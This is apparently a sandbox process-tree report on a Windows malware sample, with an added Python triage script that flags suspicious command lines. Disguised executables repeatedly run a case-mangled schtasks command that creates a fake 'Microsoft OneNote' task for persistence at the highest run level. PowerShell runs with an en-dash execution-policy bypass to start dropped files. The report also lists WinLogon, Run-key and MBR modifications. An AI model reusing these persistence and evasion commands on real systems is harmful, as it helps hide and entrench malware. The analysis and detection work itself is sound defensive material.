C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:768
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4800
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1896
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1116
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1500
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1876
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1008
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2448
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3880
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2404
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3748
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2908
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1168
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4388
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1660
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1416
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:5076
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4068
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:736
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2392
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:5036
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4780
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:544
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4808
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1548
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1352
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4872
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2284
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1804
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4996
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2200
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1008
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2728
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1044
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1520
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2792
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4520
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4488
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2852
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:656
-
-
-
  C:\Windows\System32\cmd.exe  PID 4348
      "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\upzczhsp.pue.png"' & exit
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID 1316
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\upzczhsp.pue.png"'
        - Command and Scripting Interpreter: PowerShell
  Repeated CMD.exe → schtasks.exe pair, 14 further occurrences, identical command lines every time (CMD.exe at depth 2, schtasks.exe at depth 3):
  C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
    C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST

  PIDs in tree order; the tag column is the sandbox signature attached to that schtasks.exe process (blank where none was attached):
  CMD.exe PID   schtasks.exe PID   tag
  4736          2324
  3304          4724               Creates scheduled task(s)
  1208          1112
  4928          3320               Creates scheduled task(s)
  1712          2572
  1252          3084
  2840          4032               Creates scheduled task(s)
  1564          1852
  3748          1568
  3556          4456
  3176          4088
  452           5036
  1116          4808
  4720          4788
  C:\Windows\System32\cmd.exe  PID 1912
      "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ov5u5ysv.lnq.exe"' & exit
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID 4736
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ov5u5ysv.lnq.exe"'
        - Command and Scripting Interpreter: PowerShell
      C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ov5u5ysv.lnq.exe  PID 2664
          "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ov5u5ysv.lnq.exe"
          - Modifies WinLogon for persistence
          - Executes dropped EXE
          - Adds Run key to start application
          - Writes to the Master Boot Record (MBR)
          - Suspicious use of FindShellTrayWindow
  Repeated CMD.exe → schtasks.exe pair, 21 further occurrences, identical command lines every time (CMD.exe at depth 2, schtasks.exe at depth 3):
  C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
    C:\Windows\system32\schtasks.exe
        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST

  PIDs in tree order; the tag column is the sandbox signature attached to that schtasks.exe process (blank where none was attached):
  CMD.exe PID   schtasks.exe PID   tag
  1872          4624
  4252          3488
  4920          1408               Creates scheduled task(s)
  4388          4848
  4572          748
  4836          1124               Creates scheduled task(s)
  4532          4996
  4328          1692
  228           2524
  3980          4628
  4280          2396
  5008          3656
  3904          1556
  4728          1484
  3956          4484
  624           672                Creates scheduled task(s)
  1912          3160               Creates scheduled task(s)
  3520          4740
  3276          2056
  1872          3672
  4252          2244               Creates scheduled task(s)
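Added triage example; this is not code from the sandbox report, from the sandbox vendor or from the sample, and the report itself contains no such script. It parses command lines of the kind listed in the tree above and reports the points an analyst should notice. Three details in the tree drive the checks. First, the scheduled-task command is case-mangled (SchTaSKs) and passes /mo -1; Microsoft documents the schtasks /create MINUTE modifier range as 1 to 1439, so an out-of-range value is expected to be rejected, which fits the pair being re-issued dozens of times over the run. The "Creates scheduled task(s)" tag is attached to some of these identical schtasks.exe processes and not to others, so treat it as a heuristic and confirm with the Task Scheduler operational log or schtasks /query rather than assuming the task exists. Second, both PowerShell launches put an en dash (U+2013) in front of ExecutionPolicy; PowerShell's tokenizer accepts en dash, em dash and horizontal bar as the parameter prefix, so the command runs while a literal "-ExecutionPolicy Bypass" string match misses it. Third, the first launch points Start-Process at a .png under the Templates directory and has no child process in the tree, while the later one points at an .exe and spawns it; Start-Process on a non-executable goes through the shell file association instead of running the file. The sample input below is the command lines quoted from this tree with their reported PIDs, plus one benign service line from the end of the report; the /MO ranges are Microsoft's documented values, and every finding string, threshold and helper name is this example's own.

```python
"""Triage of sandbox process-tree command lines (added example, not report code)."""
import re

# PowerShell's tokenizer accepts en dash (U+2013), em dash (U+2014) and
# horizontal bar (U+2015) as the parameter dash, so "–ExecutionPolicy" runs
# but slips past a literal "-ExecutionPolicy" match. Fold them to ASCII first.
UNICODE_DASHES = str.maketrans({"\u2013": "-", "\u2014": "-", "\u2015": "-"})
# Documented schtasks /create /MO ranges by schedule type (Microsoft docs).
MO_RANGE = {"minute": (1, 1439), "hourly": (1, 23), "daily": (1, 365), "weekly": (1, 52)}
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\", re.I)
SYSTEM_DIRS = re.compile(r"^[a-z]:\\(?:program files|windows)\\", re.I)
IMAGE_LIKE = {"png", "jpg", "jpeg", "gif", "bmp", "txt", "pdf"}


def normalize(cmdline):
    return cmdline.translate(UNICODE_DASHES)


def split_args(cmdline):
    # Minimal Windows-style split: a double-quoted run stays one token.
    return re.findall(r'"[^"]*"|\S+', cmdline)


def parse_schtasks(cmdline):
    """Return {switch: value or True} for a schtasks invocation, else None."""
    toks = split_args(normalize(cmdline))
    start = next((i for i, t in enumerate(toks)
                  if t.strip('"').lower().rsplit("\\", 1)[-1] in ("schtasks", "schtasks.exe")), None)
    if start is None:
        return None
    opts, i, seps = {}, start + 1, ("&", "&&", "|", "||")
    while i < len(toks) and toks[i] not in seps:          # stop at the "& exit" tail
        tok, nxt = toks[i], toks[i + 1] if i + 1 < len(toks) else None
        if not tok.startswith("/"):
            i += 1
            continue
        if nxt is None or nxt.startswith("/") or nxt in seps:
            opts[tok[1:].lower()] = True                   # bare switch: /create, /f
            i += 1
        else:
            opts[tok[1:].lower()] = nxt.strip('"')         # switch with a value: /mo -1
            i += 2
    return opts


def assess_schtasks(cmdline):
    opts = parse_schtasks(cmdline)
    if not opts or not opts.get("create"):
        return None
    findings = []
    token = re.search(r"(?i)schtasks(?:\.exe)?", cmdline).group(0)
    if token not in (token.lower(), token.upper(), token.capitalize()):
        findings.append(f"case-mangled binary name {token!r} (defeats exact string rules)")
    tn, tr = str(opts.get("tn", "")), str(opts.get("tr", ""))
    if str(opts.get("rl", "")).lower() == "highest":
        findings.append("/RL HIGHEST requests the highest run level the account allows")
    if USER_WRITABLE.match(tr):
        findings.append(f"task action in a user-writable path: {tr}")
    if tn.lower().startswith("microsoft ") and tr and not SYSTEM_DIRS.match(tr):
        findings.append(f"task name {tn!r} imitates a Microsoft product, action is outside Program Files/Windows")
    sc, mo = str(opts.get("sc", "")).lower(), opts.get("mo")
    if sc in MO_RANGE and isinstance(mo, str):
        lo, hi = MO_RANGE[sc]
        if not (mo.lstrip("-").isdigit() and lo <= int(mo) <= hi):
            findings.append(f"/mo {mo} outside the documented {sc} range {lo}-{hi}; schtasks is expected to reject it")
    return {"task_name": tn, "action": tr, "schedule": sc, "modifier": mo,
            "run_level": opts.get("rl"), "findings": findings}


def assess_powershell(cmdline):
    norm = normalize(cmdline)
    if not re.search(r"(?i)\bpowershell(?:\.exe)?\b", norm):
        return None
    findings = []
    if norm != cmdline:
        findings.append("non-ASCII dash as parameter prefix (evades a literal '-ExecutionPolicy' match)")
    if re.search(r"(?i)-(?:ex\w*|ep)\s+bypass", norm):        # -ExecutionPolicy / -ep abbreviations
        findings.append("execution policy bypass")
    m = re.search(r"(?i)start-process\s+-filepath\s+['\"]*([^'\"]+)", norm)
    target = m.group(1).strip() if m else None
    if target:
        if USER_WRITABLE.match(target):
            findings.append(f"launch target in a user-writable path: {target}")
        ext = target.rsplit(".", 1)[-1].lower()
        if ext in IMAGE_LIKE:
            findings.append(f".{ext} target: Start-Process hands it to the shell association, check the tree for a child")
    return {"target": target, "findings": findings}


# Command lines quoted from the process tree above, with the PIDs the report gives.
SAMPLE_TREE = [
    ('"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" '
     '/tr "C:\\Users\\Admin\\Documents\\Microsoft Project.exe" /RL HIGHEST & exit', 2252),
    ("powershell \u2013ExecutionPolicy Bypass Start-Process -FilePath "
     "'\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\upzczhsp.pue.png\"'", 1316),
    ("powershell \u2013ExecutionPolicy Bypass Start-Process -FilePath "
     "'\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\ov5u5ysv.lnq.exe\"'", 4736),
    ("C:\\Windows\\system32\\wbem\\WmiApSrv.exe", 4028),   # benign service line, yields no finding
]


def triage(tree=SAMPLE_TREE):
    """Return [(pid, assessment)] for every entry that produced at least one finding."""
    hits = []
    for cmdline, pid in tree:
        result = assess_schtasks(cmdline) or assess_powershell(cmdline)
        if result and result["findings"]:
            hits.append((pid, result))
    return hits


if __name__ == "__main__":
    for pid, res in triage():
        print(pid, res.get("task_name") or res.get("target"))
        for finding in res["findings"]:
            print("   -", finding)
```

Run it as a script to print the findings for the three suspicious entries; to use it on a real export, feed triage() a list of (command line, PID) pairs pulled from the sandbox JSON or from Sysmon event 1 records. Normalising the Unicode dashes before any string match is the one step that generalises: the same trick works against any rule that greps for an ASCII "-" in PowerShell switches.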
C:\Windows\system32\wbem\WmiApSrv.exe  PID 4028
    C:\Windows\system32\wbem\WmiApSrv.exe
    - Loads dropped DLL

C:\Windows\system32\AUDIODG.EXE  PID 1204
    C:\Windows\system32\AUDIODG.EXE 0x3bc 0x4a8
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken

C:\Program Files\Google\Chrome\Application\chrome.exe  PID 4496
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
  C:\Program Files\Google\Chrome\Application\chrome.exe  PID 3472
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcf4b0ab58,0x7ffcf4b0ab68,0x7ffcf4b0ab78
  C:\Program Files\Google\Chrome\Application\chrome.exe  PID 5056
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1628 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:2
  C:\Program Files\Google\Chrome\Application\chrome.exe  PID 1948
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1932 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe  PID 2216
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2292 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe  PID 2416
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2812 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:1
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2820 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:12⤵PID:1168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4352 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:12⤵PID:3244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4596 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:82⤵PID:396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4720 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:82⤵PID:1020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4820 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:82⤵PID:1608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4840 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:82⤵PID:1840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4380 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:82⤵PID:2980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4648 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:82⤵PID:3240
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4716 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:82⤵PID:4144
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1852 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:22⤵PID:2056
-
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵PID:348
-
C:\Users\Public\Documents\Sage CRM.exe"C:\Users\Public\Documents\Sage CRM.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:4944 -
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4116
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1544
-
-
-
C:\Users\Admin\Documents\Microsoft Project.exe"C:\Users\Admin\Documents\Microsoft Project.exe"2⤵
- Executes dropped EXE
PID:2728 -
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit3⤵PID:768
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST4⤵PID:4116
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit3⤵PID:1172
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST4⤵PID:3844
-
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:916
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:1568
-
C:\Users\Public\Documents\Sage CRM.exe"C:\Users\Public\Documents\Sage CRM.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:3700 -
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4172
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1716
-
-
-
C:\Users\Admin\Documents\Microsoft Project.exe"C:\Users\Admin\Documents\Microsoft Project.exe"2⤵
- Executes dropped EXE
PID:2720 -
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit3⤵PID:780
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:3880
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit3⤵PID:180
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST4⤵PID:4032
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit3⤵PID:2976
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST4⤵PID:2404
-
-
-
-
